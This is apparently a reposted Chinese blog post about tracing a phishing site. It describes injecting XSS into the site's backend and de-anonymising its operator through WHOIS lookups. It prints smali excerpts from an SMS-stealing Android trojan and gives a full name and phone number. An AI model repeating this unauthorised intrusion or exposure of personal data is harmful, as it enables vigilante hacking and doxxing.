事件起因很簡單,因為一條短信【偽基站】而引起的。。【目標站點:http://www.XXXXXlb.com】
0X01 滲透
魚站的主頁
魚站釣魚界面
丟一段XSS進去玩玩
過了一會,XSS平臺收到了返回的信息並得到後臺地址【http://www.XXXXXlb.com/houtai987】
網站讓下載的那個APP是款短信攔截木馬,一會順便玩玩
後臺數據蠻多的。。。
本人對數據進行了簡單的整理
由於涉及個人隱私以及資金安全,就不提供樣本和源文件了
0X02社工
首先,對域名進行了WHIOS反查,發現其用[email protected]郵箱註冊了28個域名
在排查過程中又發現[email protected]和[email protected]兩個郵箱其中,[email][email protected][/email]註冊了7個域名,同時確認其名為馮仕周
[email protected]註冊了共計64個域名
同時,對名字為馮仕周進行了反查,發現註冊了20餘個域名
又發現郵箱地址為[email protected]和[email protected]的兩個地址,由於後續域名及涉及QQ和郵箱過多,不再累贅
0X03攔截馬分析
所需工具:Android Killer1.31
環境配置:
1、所需軟件:JAVA_JDK
Android Killer1.31
2、安裝JAVA_JDK後依次計算機(我的電腦)→屬性,然後看圖
然後新建JAVA_HOME、CLASSPATH、Path三個變量
相關變量設置如下• JAVA_HOME: C:\Program FiIes\Java\jdkxxxxxx【這個是你JDK安裝地址!直接到根目錄下即可!】• CLASSPATH: .;%JAVA_HOME%\Iib\dt.jar;%JAVA_HOME%\Iib\tools.jar;• Path: ;%JAVA_HOME%\bin;%JAVA_HOM E%\jre\bin;
3、運行AndroidKiller
打開我們的樣本【攔截馬】
APP權限&信息名稱:中國移動兌換客戶端包名:com.noticessk.w.q.aerosp入口:com.phone2.stop.activity.MainActivity版本信息:Ver:5.5.365(98) SDK:8 TargetSDK:19權限信息: android.permission.RECEIVE_WAP_PUSH//允許APP接受WAP信息 android.permission.RECEIVE_BOOT_COMPLETED//自啟動 android.permission.MODIFY_AUDIO_SETTINGS//音頻改動 android.permission.WRITE_EXTERNAL_STORAGE//寫入/讀取SD卡 android.permission.RECEIVE_USER_PRESENT//讀取聯繫人信息 android.permission.READ_CONTACTS//讀取聯繫人信息 android.permission.INTERNET//網絡信息(允許訪問網絡) android.permission.READ_PHONE_STATE//讀取手機信息(識別碼什麼的) android.permission.READ_SMS//讀取短/彩信 android.permission.WRITE_SETTINGS //修改系統全局設置 android.permission.VIBRATE//控制振動器 android.permission.RECEIVE_SMS//回覆短信 android.permission.ACCESS_NETWORK_STATE//查看網絡狀態 android.permission.GET_TASKS//檢索運行中的程序 android.permission.WRITE_SMS//寫短信 android.permission.SEND_SMS//發送短信 android.permission.ACCESS_WIFI_STATE//查看WIFI狀態由於該APP獲取了過多的權限【甚至包括設備管理器權限】,所以我們有必要進行下一步分析
那麼這個APP獲取這麼多權限幹什麼呢?我們繼續來分析!看下面的代碼(位置smail\com\phone\stop\db\a.smail)
return-void
.end method
.method public d()Ljava/lang/String;
.locals 3
iget-object v0, p0, Lcom/phone/stop/db/a;->b:Landroid/content/SharedPreferences;
const-string v1, "a100"
const-string v2, "15605364232"//手機號出現!
invoke-interface {v0, v1, v2}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
move-result-object v0
return-object v0
獲取設備管理器權限進行自我保護【防止用戶(被害者)卸載】
move-result v0
if-nez v0, :cond_0
new-instance v0, Landroid/content/Intent;
const-string v2, "android.app.action.ADD_DEVICE_ADMIN"
invoke-direct {v0, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V/<init>
const-string v2, "android.app.extra.DEVICE_ADMIN"
invoke-virtual {v0, v2, v1}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
const-string v1, "android.app.extra.ADD_EXPLANATION"
const-string v2, "\\u63d0\\u9ad8\\u6743\\u9650\\u83b7\\u53d6\\u4fdd\\u62a4" //提權獲得保護
invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
const/4 v1, 0x0
由於出現了手機號,我們可以確定APP將一些隱私發送到了這個號碼上,結果我們的下面分析也證明了這個想法
發送激活成功與否短信到15605364232
invoke-static {p0}, Lcom/phone/stop/db/a;->a(Landroid/content/Context;)Lcom/phone/stop/db/a;
move-result-object v0
const/4 v1, 0x1
invoke-virtual {v0, v1}, Lcom/phone/stop/db/a;->a(Z)V
const-string v0, "\\u6fc0\\u6d3b\\u6210\\u529f" //激活成功
invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V
:cond_0
:goto_0
const/4 v1, 0x0
const-wide/16 v2, 0x3e8
invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->sendEmptyMessageDelayed(IJ)Z
return-void
:cond_1
const-string v0, "\\u6fc0\\u6d3b\\u5931\\u8d25" //激活失敗
invoke-static {v0, p0}, Lcom/phone/stop/e/f;->a(Ljava/lang/String;Landroid/content/Context;)V
goto :goto_0
.end method
發送安裝成功與否和識別碼以及系統版本和手機型號等信息到15605364232
move-result-object v0
new-instance v1, Ljava/lang/StringBuilder;
const-string v2, "\\u8f6f\\u4ef6\\u5b89\\u88c5\\u5b8c\\u6bd5\n\\u8bc6\\u522b\\u7801:" //軟件安裝完畢!識別碼:
invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V/<init>
invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v0
move-result-object v0
const-string v1, ";\n\\u7cfb\\u7edf\\u7248\\u672c:" //系統版本:
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;//獲取系統版本
move-result-object v0
invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V/<init>
const-string v1, "\\u578b\\u53f7:"//型號
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v0
sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
invoke-static {v1}, Lcom/phone/stop/e/e;->a(Ljava/lang/String;)Ljava/lang/String;
move-result-object v1
move-result-object v0
const-string v1, ";\n\\u624b\\u673a:"//獲取手機廠商名字
invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v0
0X04總結
至此,釣魚網站的人基本信息已經拿到
姓名:馮X周
手機:1XXX5364232
QQ:179XXX590
常用郵箱:[email protected]、[email protected]、[email protected]、[email protected]、[email protected]
本文作者:Sp4ce,轉載自:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=10283&ctid=127
閱讀更多 Whitezero 的文章
